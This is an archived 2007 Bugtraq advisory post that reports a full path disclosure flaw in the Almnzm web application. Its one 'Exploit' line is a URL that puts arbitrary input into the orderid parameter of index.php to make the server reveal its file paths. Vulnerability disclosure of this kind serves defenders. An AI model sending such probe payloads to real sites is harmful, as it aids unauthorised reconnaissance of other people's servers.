Full Path Disclosure in Almnzm

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Full Path Disclosure in Almnzm
From: xx_hack_xx_2004@xxxxxxxxxxx
Date: 29 May 2007 20:09:16 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello
Vulnerable : Almnzm
Web : http://www.almnzm.com

Exploit :
http://example.com/almnzm/index.php?action=activateorder&orderid=['Anything']

--------------------

Discovered By Linux_Drox
www.LeZr.Com

Best Regards ,,,,

Prev by Date: cpcommerce < v1.1.0 [sql injection]
Next by Date: Particle Blogger 1.2.1 SQL Injection
Previous by thread: cpcommerce < v1.1.0 [sql injection]
Next by thread: Particle Blogger 1.2.1 SQL Injection
Index(es):
- Date
- Thread